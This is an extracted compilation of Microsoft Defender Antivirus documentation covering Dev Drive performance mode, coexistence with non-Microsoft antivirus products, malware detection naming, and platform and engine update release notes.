periodic scanning. Note that the limited periodic option is a toggle to enable or disable
periodic scanning. Sliding the switch to On shows the standard Microsoft Defender
Antivirus options underneath the non-Microsoft antivirus product. The limited periodic
scanning option will appear at the bottom of the page.
Related articles
 Tip

 Tip
Feedback

Protect Dev Drive using performance
mode
Article • 02/22/2024
７ Note
Applies to:

Platforms
Windows 11
What is performance mode

Performance mode is now available on Windows 11 as a new Microsoft Defender
Antivirus capability. Performance mode reduces the performance impact of Microsoft
Defender Antivirus scans for files stored on designated Dev Drive. The goal of
performance mode is to improve functional performance for developers who use
Windows 11 devices.
It's important to note that performance mode can run only on Dev Drive. Additionally,
real-time protection must be turned on for performance mode to function. Enabling this
feature on a Dev Drive doesn't change standard real-time protection running on
volumes with operating systems or other volumes formatted FAT32 or NTFS.
Dev Drive
Dev Drive is a new form of storage volume available to improve performance for key
developer workloads. It builds on ReFS technology to employ targeted file system
optimizations and provide more control over storage volume settings and security,
including trust designation, antivirus configuration, and administrative control over
which filters are attached.
For more information about Dev Drive, see: Set up a Dev Drive on Windows 11.
Performance mode compared to real-time protection

By default, to give the best possible performance, creating a Dev Drive automatically
grants trust in the new volume. A trusted Dev Drive volume causes real-time protection
to run in a special asynchronous performance mode for that volume. Running
performance mode provides a balance between threat protection and performance. The
balance is achieved by deferring security scans until after the open file operation has
completed, instead of performing the security scan synchronously while the file
operation is being processed. This mode of performing security scans inherently
provides faster performance, but with less protection. However, enabling performance
mode provides significantly better protection than other performance tuning methods
such as using folder exclusions, which block security scans altogether.
７ Note
To enable performance mode, real-time protection must be turned on.
The following table summarizes performance mode synchronous and asynchronous

scan behavior.
ﾉ Expand table
Performance mode Scan type Description Summary

state
Not enabled (Off) Synchronous Opening a file initiates a real-time Open now, scan
(Real-time protection scan. now.
protection)
Enabled (On) Asynchronous File open operations are scanned Open now, scan
asynchronously. later.
An untrusted Dev Drive doesn't have the same benefits as a trusted Dev Drive. Security
runs in synchronous, real-time protection mode when a Dev Drive is untrusted. Real-time
protection scans can affect performance.
Microsoft Defender Antivirus requirements for

performance mode
1. Review the requirements that are specific to Dev Drive. See Set up a Dev Drive on
Windows 11.
2. Make sure Microsoft Defender Antivirus is up to date.
Antimalware platform version: 4.18.2303.8 (or later)

Antimalware security intelligence version: 1.385.1455.0 (or later)
Real-time protection is turned on
Manage performance mode

1. Performance mode can only run on a trusted Dev Drive and is enabled by default
when a new Dev Drive is created. For more information, see Understanding
security risks and trust in relation to Dev Drive.
2. Enforce the Microsoft Defender Antivirus Performance Mode by using Intune,

Group Policy, or PowerShell.
Intune
Enable performance mode status via the OMA-URI settings shown in the following table.
ﾉ Expand table
Setting Value
OMA-URI: ./Device/Vendor/MSFT/Defender/Configuration/PerformanceModeStatus
Data type Integer
Value 1
Group Policy
1. In GPMC.msc or GPedit.msc, go to Computer Configuration > Administrative
Templates > Windows Components > Microsoft Defender Antivirus > Real-time
Protection.
2. Double-click Configure performance mode status.


3. Select Enabled.
4. Select Apply, and then select OK.
PowerShell
1. Open PowerShell as an administrator on the device.
2. Type set-MpPreference -PerformanceModeStatus Enabled , and then press Enter.
Verify performance mode is enabled

To verify that Dev Drive and Defender Performance Mode is enabled, follow these steps:
1. In the Windows Security App, go to Virus & threat Protection settings > Manage
settings, and verify that Dev Drive protection is enabled.
2. Select See volumes.


ﾉ Expand table
Drive Status
C: Since the system drive (for example, C: or D:) drive is formatted with NTFS, it's not
eligible for Defender Performance mode.
D: Dev Drive is enabled but Defender Performance mode isn't enabled.
F: Dev Drive is enabled, and Defender Performance mode is enabled.
See also
Set up a Dev Drive on Windows 11
 Tip
Feedback

compatibility with other security
products
Article • 12/12/2023
Applies to:

Platforms
Windows
Microsoft Defender Antivirus is available on endpoints running the following versions of

Windows:
Windows 11
Windows 10
Windows Server 2022
Windows Server 2019
Windows Server, version 1803, or newer
Windows Server 2016
Microsoft Defender Antivirus is also available for older versions of Windows under
certain conditions.
On Windows Server 2012 R2, when onboarded using the modern, unified solution,
Microsoft Defender Antivirus is installed in Active mode.
On Windows 8.1, with System Center Endpoint Protection, enterprise-level

endpoint antivirus protection is offered and managed through Microsoft Endpoint
On consumer devices on Windows 8.1, Windows Defender is available (although it

doesn't provide enterprise-level management).
If you're using non-Microsoft antivirus/antimalware software, you might be able to run

Microsoft Defender Antivirus alongside the other antivirus solution. This article describes
what happens with Microsoft Defender Antivirus and non-Microsoft
antivirus/antimalware software, with and without Microsoft Defender for Endpoint.
Antivirus protection without Defender for
Endpoint
This section describes what happens when you use Microsoft Defender Antivirus
alongside non-Microsoft antivirus/antimalware products on endpoints that aren't
onboarded to Defender for Endpoint.
In general, Microsoft Defender Antivirus doesn't run in passive mode on devices that
aren't onboarded to Defender for Endpoint.
The following table summarizes what to expect:
ﾉ Expand table
Windows version Primary Microsoft Defender Antivirus state

antivirus/antimalware
solution
Windows 10 Microsoft Defender Antivirus Active mode

Windows 11
Windows 10 A non-Microsoft Disabled mode (happens automatically)

Windows 11 antivirus/antimalware solution
Note that in Windows 11, if
SmartAppControl is enabled, Microsoft
Defender Antivirus goes into passive mode.
Windows Server Microsoft Defender Antivirus Active mode

2022
Windows Server
2019
Windows Server,
version 1803, or
newer
Windows Server
2016
Windows Server
2012 R2
Windows Server A non-Microsoft Disabled

2022 antivirus/antimalware solution (set manually; see the note that follows this
Windows Server table)
2019
Windows Server,
version 1803, or
newer
Windows version Primary Microsoft Defender Antivirus state
antivirus/antimalware
solution
Windows Server
2016
７ Note
On Windows Server, if you're running a non-Microsoft antivirus product, you can

uninstall Microsoft Defender Antivirus by using the following PowerShell cmdlet (as
an administrator): Uninstall-WindowsFeature Windows-Defender . Restart your server
to finish removing Microsoft Defender Antivirus. On Windows Server 2016, you
might see Windows Defender Antivirus instead of Microsoft Defender Antivirus.
If the device is onboarded to Microsoft Defender for Endpoint, you can use Microsoft
Defender Antivirus in passive mode as described later in this article.
Microsoft Defender Antivirus and non-

Microsoft antivirus/antimalware solutions
７ Note
In general, Microsoft Defender Antivirus can be set to passive mode only on

endpoints that are onboarded to Defender for Endpoint.
Whether Microsoft Defender Antivirus runs in active mode, passive mode, or is disabled
depends on several factors, such as:
Which version of Windows is installed on an endpoint

Whether Microsoft Defender Antivirus is the primary antivirus/antimalware solution
on the endpoint
Whether the endpoint is onboarded to Defender for Endpoint
The following table summarizes the state of Microsoft Defender Antivirus in several
scenarios.
ﾉ Expand table
Antivirus/antimalware Onboarded to Microsoft Defender Smart App
solution Defender for Antivirus state Control State
Endpoint?
Microsoft Defender Antivirus Yes Active mode N/A
Microsoft Defender Antivirus No Active mode On, Evaluation,

or Off
A non-Microsoft Yes Passive mode N/A

antivirus/antimalware solution (automatically)
A non-Microsoft No Disabled Evaluation or

antivirus/antimalware solution (automatically) On
７ Note
Smart App Control is a consumer-only product that's used on new Windows 11

installs. It can run alongside your antivirus software and block apps that are
considered to be malicious or untrusted. Learn more about Smart App Control .
Windows Server and passive mode

On Windows Server 2019, Windows Server, version 1803 or newer, Windows Server
2016, or Windows Server 2012 R2, Microsoft Defender Antivirus doesn't enter passive
mode automatically when you install a non-Microsoft antivirus product. In those cases,
set Microsoft Defender Antivirus to passive mode to prevent problems caused by having
multiple antivirus products installed on a server. You can set Microsoft Defender
Antivirus to passive mode using a registry key as follows:

Type: REG_DWORD
Value: 1
You can view your protection status in PowerShell by using the command Get-
MpComputerStatus. Check the value for AMRunningMode . You should see Normal, Passive,
or EDR Block Mode if Microsoft Defender Antivirus is enabled on the endpoint.
For passive mode to work on endpoints running Windows Server 2016 and Windows
Server 2012 R2, those endpoints must be onboarded with the modern, unified solution
described in Onboard Windows servers.
On Windows Server 2016, Windows Server 2012 R2, Windows Server version 1803 or
newer, Windows Server 2019, and Windows Server 2022, if you're using a non-Microsoft
antivirus product on an endpoint that isn't onboarded to Microsoft Defender for
Endpoint, disable/uninstall Microsoft Defender Antivirus manually to prevent problems
caused by having multiple antivirus products installed on a server. However, Defender
for Endpoint includes capabilities that further extend the antivirus protection that is
installed on your endpoint. If you have Defender for Endpoint, you can benefit from
running Microsoft Defender Antivirus alongside another antivirus solution.
For example, Endpoint detection and response (EDR) in block mode provides added
protection from malicious artifacts even if Microsoft Defender Antivirus isn't the primary
antivirus product. Such capabilities require Microsoft Defender Antivirus to be installed
and running in passive mode or active mode.
 Tip
On Windows Server 2016, you might see Windows Defender Antivirus instead of
Requirements for Microsoft Defender Antivirus

to run in passive mode
In order for Microsoft Defender Antivirus to run in passive mode, endpoints must meet
the following requirements:
Operating system: Windows 10 or newer; Windows Server 2022, Windows Server

2019, or Windows Server, version 1803, or newer
(Windows Server 2012 R2 and Windows Server 2016 if onboarded using the
modern, unified solution).
Microsoft Defender Antivirus must be installed.
Another non-Microsoft antivirus/antimalware product must be installed and used
as the primary antivirus solution.
Endpoints must be onboarded to Defender for Endpoint.
） Important
Microsoft Defender Antivirus is only available on devices running Windows 10

and 11, Windows Server 2022, Windows Server 2016, Windows Server 2019,
Windows Server, version 1803 or newer, Windows Server 2016, and Windows
Server 2012 R2.
Passive mode is only supported on Windows Server 2012 R2 & 2016 when the
device is onboarded using the modern, unified solution.
In Windows 8.1, enterprise-level endpoint antivirus protection is offered as
System Center Endpoint Protection, which is managed through Microsoft
Endpoint Configuration Manager.
Windows Defender is also offered for consumer devices on Windows 8.1,
although Windows Defender does not provide enterprise-level management.
How Microsoft Defender Antivirus affects

Defender for Endpoint functionality
Defender for Endpoint affects whether Microsoft Defender Antivirus can run in passive
mode. And, the state of Microsoft Defender Antivirus can affect certain capabilities in
Defender for Endpoint. For example, real-time protection works when Microsoft
Defender Antivirus is in active or passive mode, but not when Microsoft Defender
Antivirus is disabled or uninstalled.
） Important
The table in this section summarizes the features and capabilities that are
actively working or not, according to whether Microsoft Defender Antivirus is
in active mode, passive mode, or disabled/uninstalled. This table designed to
be informational only.
Do not turn off capabilities, such as real-time protection, cloud-delivered
protection, or limited periodic scanning if you are using Microsoft Defender
Antivirus in passive mode, or if you are using EDR in block mode, which works
behind the scenes to detect and remediate malicious artifacts that were
detected post-breach.
ﾉ Expand table
Protection Microsoft Defender Microsoft Defender Microsoft Defender
Antivirus Antivirus Antivirus
(Active mode) (Passive mode) (Disabled or
uninstalled)
Real-time protection Yes See note 1 No
Cloud-delivered Yes No No
protection
Network protection Yes No No
Attack surface reduction Yes No No

rules
File scanning and Yes Yes No

detection information See note 2
Threat remediation Yes See note 3 No
Security intelligence Yes Yes No

updates See note 4
Data Loss Prevention Yes Yes No
Controlled folder access Yes No No
Web content filtering Yes See note 5 No
Device control Yes Yes No
PUA protection Yes No No
Notes about protection states

1. In general, when Microsoft Defender Antivirus is in passive mode, real-time
protection doesn't provide any blocking or enforcement, even though it's enabled
and in passive mode.
2. When Microsoft Defender Antivirus is in passive mode, scans aren't scheduled. If

scans are scheduled in your configuration, the schedule is ignored. However, every
30 days (default number of days) a quick catchup scan continues to occur unless
"Turn on catch-up quick scan" is set to disabled. Scan tasks that are set up in
Windows Task Scheduler continue to run according to their schedule. If you have
scheduled tasks, you can remove them, if preferred.
3. When Microsoft Defender Antivirus is in passive mode, it doesn't remediate

threats. However, Endpoint detection and response (EDR) in block mode can
remediate threats. In this case, you might see alerts showing Microsoft Defender
Antivirus as a source, even when Microsoft Defender Antivirus is in passive mode.
4. The security intelligence update cadence is controlled by Windows Update settings

only. Defender-specific update schedulers (daily/weekly at specific time, interval-
based) settings only work when Microsoft Defender Antivirus is in active mode.
They're ignored in passive mode.
5. When Microsoft Defender Antivirus is in passive mode, web content filtering only
works with the Microsoft Edge browser.
） Important
Endpoint data loss prevention protection continues to operate normally

when Microsoft Defender Antivirus is in either active or passive mode.
Don't disable, stop, or modify any of the associated services that are used by
Microsoft Defender Antivirus, Defender for Endpoint, or the Windows Security
app. This recommendation includes the wscsvc, SecurityHealthService,
MsSense, Sense, WinDefend, or MsMpEng services and processes. Manually
modifying these services can cause severe instability on your devices and can
make your network vulnerable. Disabling, stopping, or modifying those
services can also cause problems when using non-Microsoft antivirus
solutions and how their information is displayed in the Windows Security
app.
In Defender for Endpoint, you can turn EDR in block mode on, even if
Microsoft Defender Antivirus isn't your primary antivirus solution. EDR in
block mode detects and remediate malicious items that are found on the
device (post breach). To learn more, see EDR in block mode.
How to confirm the state of Microsoft

Defender Antivirus
You can use one of several methods to confirm the state of Microsoft Defender
Antivirus. You can:
Use the Windows Security app to identify your antivirus app.

Use Task Manager to confirm that Microsoft Defender Antivirus is running.
Use Windows PowerShell to confirm that Microsoft Defender Antivirus is running.
Use Windows PowerShell to confirm that antivirus protection is running.
） Important
group policy setting no longer completely disables Windows Defender Antivirus on
Windows Server 2012 R2 and later. Instead, it place Microsoft Defender Antivirus
into passive mode. In addition, the tamper protection allows a switch to active
mode, but not to passive mode.

Microsoft Defender for Endpoint, Microsoft Defender Antivirus remains
disabled.
To switch Microsoft Defender Antivirus to passive mode, even if it was
disabled before onboarding, you can apply the ForceDefenderPassiveMode
configuration with a value of 1 . To place it into active mode, switch this value
to 0 instead.

protection prevents it from going back into passive mode even when
Use the Windows Security app to identify your antivirus

app
1. On a Windows device, open the Windows Security app.
3. Under Who's protecting me? select Manage providers.
4. On the Security providers page, under Antivirus, you should see Microsoft
Defender Antivirus is turned on.
Use Task Manager to confirm that Microsoft Defender

Antivirus is running
1. On a Windows device, open the Task Manager app.
2. Select the Details tab.
3. Look for MsMpEng.exe in the list.
Use Windows PowerShell to confirm that Microsoft

Defender Antivirus is running
７ Note
Use this procedure only to confirm whether Microsoft Defender Antivirus is running
on an endpoint.
1. On a Windows device, open Windows PowerShell.
2. Run the following PowerShell cmdlet: Get-Process .
3. Review the results. You should see MsMpEng.exe if Microsoft Defender Antivirus is
enabled.
Use Windows PowerShell to confirm that antivirus

protection is running
７ Note
Use this procedure only to confirm whether antivirus protection is enabled on an

endpoint.
1. On a Windows device, open Windows PowerShell.
2. Run following PowerShell cmdlet: Get-MpComputerStatus | select AMRunningMode .
3. Review the results. You should see Normal, Passive, or EDR Block Mode if antivirus
protection is enabled on the endpoint.
７ Note
Note that this procedure is only to confirm whether antivirus protection is enabled
on an endpoint.
More details about Microsoft Defender
Antivirus states
The following sections describe what to expect when Microsoft Defender Antivirus is:
In active mode
In passive mode, or when EDR in block mode is turned on
Disabled or uninstalled
Active mode
In active mode, Microsoft Defender Antivirus is used as the antivirus app on the
machine. Settings that are configured by using Configuration Manager, Group Policy,
Microsoft Intune, or other management products apply. Files are scanned, threats are
remediated, and detection information is reported in your configuration tool (such as in
the Microsoft Intune admin center or the Microsoft Defender Antivirus app on the
endpoint).
Passive mode or EDR Block mode

In passive mode, Microsoft Defender Antivirus isn't used as the antivirus app, and
threats aren't* remediated by Microsoft Defender Antivirus. However, Endpoint
detection and response (EDR) in block mode can remediate threats. Files are scanned by
EDR, and reports are provided for threat detections that are shared with the Defender
for Endpoint service. You might see alerts showing Microsoft Defender Antivirus as a
source, even when Microsoft Defender Antivirus is in passive mode.
When Microsoft Defender Antivirus is in passive mode, you can still manage updates for
Microsoft Defender Antivirus; however, you can't move Microsoft Defender Antivirus
into active mode if your devices have a non-Microsoft antivirus product that is providing
real-time protection from malware.
Make sure to get your antivirus and antimalware updates, even if Microsoft Defender
Antivirus is running in passive mode. See Manage Microsoft Defender Antivirus
updates and apply baselines. Passive mode is only supported on Windows Server 2012
R2 & 2016 when the machine is onboarded using the modern, unified solution.
Disabled or uninstalled
When disabled or uninstalled, Microsoft Defender Antivirus isn't used as the antivirus
app. Files aren't scanned and threats aren't remediated. Disabling or uninstalling
Microsoft Defender Antivirus isn't recommended in general; if possible, keep Microsoft
Defender Antivirus in passive mode if you're using a non-Microsoft
antimalware/antivirus solution.
In cases where Microsoft Defender Antivirus is disabled automatically, it can be re-

enabled automatically if the non-Microsoft antivirus/antimalware product expires, is
uninstalled, or otherwise stops providing real-time protection from viruses, malware, or
other threats. The automatic re-enabling of Microsoft Defender Antivirus helps to
ensure that antivirus protection is maintained on your endpoints.
You might also use limited periodic scanning, which works with the Microsoft Defender
Antivirus engine to periodically check for threats if you're using a non-Microsoft
antivirus app. |
What about non-Windows devices?


See also
Microsoft Defender Antivirus on Windows clients
EDR in block mode
Learn about Endpoint data loss prevention
 Tip
Feedback

Find malware detection names for
Article • 10/31/2023
Applies to:

As malware naming schemes vary depending on who is first to report it, how it's
referred to in the media, and how some companies use specific naming conventions, it
can be confusing to understand how Defender for Endpoint detects specific malware
families.
Microsoft names specific malware according to the Computer Antivirus Research

Organization (CARO). For example, Microsoft detects the Sunburst cyberattack as
Trojan:MSIL/Solorigate.BR!dha.
To understand how Microsoft Defender for Endpoint detects specific malware families,
you can follow the steps in Find the detection name for a malware family.
Find the detection name for a malware family

To find the detection name of a malware family, you need to search the internet for the
malware name plus "hash".
1. Get the name of the malware family

2. Search the web for malware family + cyberattack + hash to find the hash
3. Look up the hash in Virus Total
4. Find the Microsoft row and how we name the malware
5. Look up the malware name in the [Microsoft Defender Security Intelligence
website] (https://www.microsoft.com/en-us/wdsi/threats ). You should see
Microsoft information and guidance specific to that malware.
For example, search for the "Sunburst cyberattack hash". One of the websites returned
in the search results should have the hash. In this example, the hash is
a25cadd48d70f6ea0c4a241d99c5241269e6faccb4054e62d16784640f8e53bc. Then,
look up this hash in Virus Total .
The results show the Microsoft row detects this malware as

Trojan:MSIL/Solorigate.BR!dha. When you look up this malware name in the Microsoft
Defender Security Intelligence website, you find information specific to that malware,
including technical details and mitigation steps.
 Tip
Feedback

Microsoft Defender Antivirus security
intelligence and product updates
Article • 02/27/2024
Applies to:

Platforms
Windows
Keeping Microsoft Defender Antivirus up to date is critical to assure your devices have
the latest technology and features needed to protect against new malware and attack
techniques. Update your antivirus protection, even if Microsoft Defender Antivirus is
running in passive mode. This article includes information about the two types of
updates for keeping Microsoft Defender Antivirus current:

Product updates
This article also includes:

How to roll back an update (if necessary)
Platform version included with Windows 10 releases
Updates for Deployment Image Servicing and Management (DISM)
 Tip
To see the most current engine, platform, and signature date, visit the Security
intelligence updates for Microsoft Defender Antivirus and other Microsoft
antimalware

Microsoft Defender Antivirus uses cloud-delivered protection (also called the Microsoft
Advanced Protection Service, or MAPS) and periodically downloads dynamic security
intelligence updates to provide more protection. These dynamic updates don't take the
place of regular security intelligence updates via security intelligence update
KB2267602.
７ Note
Updates are released under the following KBs:
Microsoft Defender Antivirus: KB2267602

System Center Endpoint Protection: KB2461484
Cloud-delivered protection is always on and requires an active connection to the

Internet to function. Security intelligence updates occur on a scheduled cadence
(configurable via policy). For more information, see Use Microsoft cloud-provided
For a list of recent security intelligence updates, see Security intelligence updates for
Microsoft Defender Antivirus and other Microsoft antimalware .
Engine updates are included with security intelligence updates and are released on a
monthly cadence.
Product updates
Microsoft Defender Antivirus requires monthly updates (KB4052623) known as platform
updates.
You can manage the distribution of updates through one of the following methods:
Windows Server Update Service (WSUS)

The usual methods you use to deploy Microsoft and Windows updates to
endpoints in your network.
For more information, see Manage the sources for Microsoft Defender Antivirus
protection updates.
Important points about product updates

Monthly updates are released in phases, resulting in multiple packages visible in
your Window Server Update Services.
This article lists changes that are included in the broad release channel. See the
latest broad channel release here .
To learn more about the gradual rollout process, and to see more information
about the next release, see Manage the gradual rollout process for Microsoft
Defender updates.
To learn more about security intelligence updates, see Security intelligence updates
for Microsoft Defender Antivirus and other Microsoft antimalware .
If you're looking for a list of Microsoft Defender processes, download the mde-
urls workbook , and then select the Microsoft Defender Processes worksheet.
The mde-urls workbook also lists the services and their associated URLs that your
network must be able to connect to, as described in Enable access to Microsoft
Defender for Endpoint service URLs in the proxy server.
Platform updates can be temporarily postponed if other protection features (such

as Endpoint DLP or Device Control) are actively monitoring running processes.
Platform updates are retried after a reboot or when all monitored services are
stopped.
In the Microsoft Endpoint Configuration Manager / Windows Server Update

Services (MECM/WSUS) catalog, the category Microsoft Defender for Endpoint
includes updates for the MSSense service in KB5005292 . KB5005292 includes
updates and fixes to the Microsoft Defender for Endpoint endpoint detection and
response (EDR) sensor. For more information, see Microsoft Defender for Endpoint
update for EDR Sensor and What's new in Microsoft Defender for Endpoint on
Windows.
Monthly platform and engine versions

All our updates contain
Performance improvements
Serviceability improvements
Integration improvements (Cloud, Microsoft Defender XDR)
January-2024 (Platform: 4.18.24010.12 | Engine:

1.1.24010.10)
Security intelligence update version: 1.405.702.0
Release date: February 27, 2024
Platform: 4.18.24010.12
Engine: 1.1.24010.10
Support phase: Security and Critical Updates
What's new
Microsoft Defender Antivirus now caches the Mark of the Web (MoTW) Alternative
Data Stream (ADS) for better performance while scanning.
Fixed an issue that occurred in attack surface reduction in warn mode when
removing scan results from the real-time protection cache.
Performance improvement added for OneNote.exe .
Cloud-based entries are regularly removed from the persistent user mode cache in
Windows Defender to prevent a uncommon issue where a user could still add a
certificate, based on an Indicator of compromise (IoC), to the cache after a file with
that certificate had already been added via cloud signature.
The Sense onboarding event is now sent in passive mode for operating systems
with the old Sense client.
Improved performance for logs created/accessed by powershell.
Improved performance for folders included in Controlled folder access(CFA) when
accessing network files.
Fixed a deadlock that occurred at shutdown for Data Loss Prevention (DLP)
enabled devices.
Fixed an issue to remove a vulnerability in the Microsoft Defender Core service.
Fixed an onboarding issue in the Unified Agent installation script install.ps1 .
Fixed a memory leak that impacted some devices that received platform update
4.18.24010.7
November-2023 (Platform: 4.18.23110.3 | Engine:

1.1.23110.2)
Release date: December 5, 2023 (Platform) / December 6, 2023 (Engine)
Platform: 4.18.23110.3
Engine: 1.1.23110.2
What's new
Fixed PowerShell cmdlet Get-MpComputerStatus to show the correct date/time for
AntivirusSignatureLastUpdated
Resolved deadock issue that occurred on systems with multiple filter drivers
reading a file when the file is copied
Added the InitializationProgress field to Get-MpComputerStatus output
Fixed installation failure on Windows Server 2016 due to existing Defender
EventLog registry key
Added the ability to have quick scans ignore Microsoft Defender Antivirus
exclusions
Fixed remediation for long running on-demand scans where the service may have
been restarted
Fixed an issue with Microsoft Defender Vulnerability Management to allow the
execution of a blocked application when the warn option is selected
Added support for managing schedule day/time for signature updates in Intune
and Defender for Endpoint security settings management
Fixed non-standard signature path loading across platforms (Windows, Mac, Linux,
Android, and iOS)
Improved handling of cached detections in attack surface reduction capabilities
Improved performance for enumerating virtual memory ranges
Known issues
None
October-2023 (Platform: 4.18.23100.2009 | Engine:

1.1.23100.2009)
Release date: November 3, 2023 (Engine) / November 6, 2023 (Platform)
Platform: 4.18.23100.2009
Engine: 1.1.23100.2009
What's new
Improved processing of environment variables in protected folders list for
controlled folder access
Improved performance of on-access scanning of files with Mark of the Web
(MoTW)
Added support for Active Directory device groups with device control
Fixed an issue so that ASROnlyPerRuleExclusions don't apply during an engine
reboot
Microsoft Defender Core service is generally available for consumer devices and is
coming soon for business customers.
Fixed an issue with device control so that device control policies remain enforced
when a platform update requires a reboot
Improved performance of device control for printing scenarios
Fixed truncation issue in the output of MpCmdRun.exe -scan (processing Unicode
characters)
Known issues
None
Previous version updates: Technical upgrade support only

After a new package version is released, support for the previous two versions is
reduced to technical support only. For more information about previous versions, see
Microsoft Defender Antivirus updates: Previous versions for technical upgrade support.

Platform and engine updates are provided on a monthly cadence. To be fully supported,
keep current with the latest platform updates. Our support structure is dynamic,
evolving into two phases depending on the availability of the latest platform version:
Security and Critical Updates servicing phase - When running the latest platform
version, you're eligible to receive both Security and Critical updates to the anti-
malware platform.
Technical Support (Only) phase - After a new platform version is released, support
for older versions (N-2) reduce to technical support only. Platform versions older
than N-2 are no longer supported. Technical support continues to be provided for
upgrades from the Windows 10 release version (see Platform version included with
Windows 10 releases) to the latest platform version.
During the technical support (only) phase, commercially reasonable support incidents
are provided through Microsoft Customer Service & Support and Microsoft's managed
support offerings (such as Premier Support). If a support incident requires escalation to
development for further guidance, requires a nonsecurity update, or requires a security
update, customers are asked to upgrade to the latest platform version or an
intermediate update (*).
７ Note
If you are manually deploying Microsoft Defender Antivirus Platform Update, or if

you are using a script or a non-Microsoft management product to deploy Microsoft
Defender Antivirus Platform Update, make sure that version 4.18.2001.10 is
installed from the Microsoft Update Catalog before the latest version of
Platform Update (N-2) is installed.
How to roll back an update

In the unfortunate event that you encounter issues after a platform update, you can roll
back to the previous or the inbox version of the Microsoft Defender platform.
To roll back to the previous version, run the following command:
"%programdata%\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe" -
RevertPlatform
To roll back this update to the version shipped with the Operating System
("%ProgramFiles%\Windows Defender")
"%programdata%\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe" -
ResetPlatform
Platform version included with Windows 10

releases
The below table provides the Microsoft Defender Antivirus platform and engine versions
that are shipped with the latest Windows 10 releases:
ﾉ Expand table
Windows 10 release Platform version Engine version Support phase
2004 (20H1/20H2) 4.18.1909.6 1.1.17000.2 Technical upgrade support (only)
1909 (19H2) 4.18.1902.5 1.1.16700.3 Technical upgrade support (only)
1903 (19H1) 4.18.1902.5 1.1.15600.4 Technical upgrade support (only)
1809 (RS5) 4.18.1807.5 1.1.15000.2 Technical upgrade support (only)

Windows 10 release Platform version Engine version Support phase
For Windows 10 release information, see the Windows lifecycle fact sheet .
７ Note
Windows Server 2016 ships with the same Platform version as RS1 and falls under
the same support phase: Technical upgrade support (only)
Windows Server 2019 ships with the same Platform version as RS5 and falls under
the same support phase: Technical upgrade support (only)
Updates for Deployment Image Servicing and

Management (DISM)
To avoid a gap in protection, keep your OS installation images up to date with the latest
antivirus and antimalware updates. Updates are available for:
Windows 10 and 11 (Enterprise, Pro, and Home editions)

Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows
Server 2012 R2
WIM and VHD(x) files
Updates are released for x86, x64, and ARM64 Windows architecture.
For more information, see Microsoft Defender update for Windows operating system
installation images .
20230809.1
Defender package version: 20230809.1
Security intelligence version: 1.395.68.0
Platform version: 4.18.23070.1004
Fixes
None
20230604.1
Fixes
None
20230503.1
Fixes
None
None
20230330.2
Fixes
None
None
20230308.1
Fixes
None
None
20230215.1
Fixes
None
None
20230118.1
Fixes
None
None
20221209.1
Fixes
None
None
20221102.3
Fixes
None
None
20221014.1
Package version: 20221014.1
Fixes
None
None
20220929.1
Fixes
None
None
20220925.2
Fixes
None
None
20220901.4
Fixes
None
None
20220802.1
Fixes
None
None
20220629.5
Fixes
None
None
20220603.3
Fixes
None
None
20220506.6
Fixes
None
None
20220321.1
Fixes
None
None
20220305.1
Fixes
None
None
20220203.1
Fixes
None
None
20220105.1
Fixes
None
None
1.1.2112.01
Package version: 1.1.2112.01
Fixes
None
None
1.1.2111.02
Fixes
Fixed an issue pertaining to localization files

None
1.1.2110.01
Fixes
None
None
1.1.2109.01
Fixes
None
None
1.1.2108.01
Fixes
None
None
1.1.2107.02
Fixes
None
None
1.1.2106.01
Fixes
None
None
1.1.2105.01
Fixes
None
None
1.1.2104.01
Fixes
None
None
1.1.2103.01
Fixes
None
None
1.1.2102.03
Fixes
None
None
1.1.2101.02
Fixes
None
None
1.1.2012.01
Fixes
None
None
1.1.2011.02
Fixes
None
Refreshed Microsoft Defender Antivirus signatures
1.1.2011.01
Fixes
None
None
1.1.2009.10
Fixes
None
Added support for Windows 10 RS1 or later OS install images.
More resources
ﾉ Expand table
Article Description
Microsoft Defender Review antimalware update packages for your OS installation images
update for Windows (WIM and VHD files). Get Microsoft Defender Antivirus updates for
operating system Windows 10 (Enterprise, Pro, and Home editions), Windows Server
installation images 2019, Windows Server 2022, Windows Server 2016, and Windows
Server 2012 R2 installation images.
Manage how protection Protection updates can be delivered through many sources.
updates are downloaded
and applied
Manage when protection You can schedule when protection updates should be downloaded.
updates should be
downloaded and applied
Manage updates for If an endpoint misses an update or scheduled scan, you can force an
endpoints that are out of update or scan the next time a user signs in.
date
Manage event-based You can set protection updates to be downloaded at startup or after
forced updates certain cloud-delivered protection events.
Manage updates for You can specify settings, such as whether updates should occur on
mobile devices and battery power that 's especially useful for mobile devices and virtual
virtual machines (VMs) machines.
Microsoft Defender for You can update the EDR sensor (MsSense.exe) that's included in the
Endpoint update for EDR new Microsoft Defender for Endpoint unified solution package
Sensor released in 2021.
 Tip

 Tip
Feedback

Microsoft Defender Antivirus updates -
Previous versions for technical upgrade
support only
Article • 02/27/2024
Applies to:

Microsoft regularly releases security intelligence updates and product updates for
Microsoft Defender Antivirus. It's important to keep Microsoft Defender Antivirus up to
date. When a new package version is released, support for the previous two versions is
reduced to technical support only. Versions that are older than the previous two
versions are listed in this article and are provided for technical upgrade support only.
September-2023 (Platform: 4.18.23090.2008 |

Engine: 1.1.23090.2007)
Release date: October 3, 2023 (Engine) | October 4, 2023 (Platform)
Platform: 4.18.23090.2008
Engine: 1.1.23090.2007
Support phase: Technical upgrade support (only)
What's new
Fixed automatic remediation during on demand scans involving archives with
multiple threats
Improved the performance of scanning files on network locations
Added support for domain computer SID for device control policies
Improved installer of unified agent to include legacy version of Windows Server
2012 (6.3.9600.17735)
Fixed issue in device control when querying Microsoft Entra group membership,
which resulted in increased network traffic.
Improved parsing of attack surface reduction exclusions in the antimalware engine
Improved reliability in scanning PE files
Improved deployments safeguards for security intelligence updates
Known issues
None
August-2023 (Platform: 4.18.23080.2006 |

Engine: 1.1.23080.2005)
Released: August 30, 2023 (Platform and Engine)
Platform: 4.18.23080.2006
Engine: 1.1.23080.2005
What's new
Fixed an issue where Microsoft Defender Antivirus switched from passive mode to
active mode following an update on Windows Server 2016 and Windows Server
2012 R2 onboarded using the modern, unified client
Fixed an issue where exclusions weren't applied correctly using gpupdate when
registry policy processing was set to process even if Group Policy Objects didn't
change
Excluded IP addresses can now be configured using Intune
Improved tamper protection on Windows Server 2016
DisableFtpParsing can now be configured through Set-MpPreference
Fixed an issue where device control policies weren't applied correctly without a
reboot following product updates
Fixed an issue in the attack surface reduction rule, Block Win32 API calls from
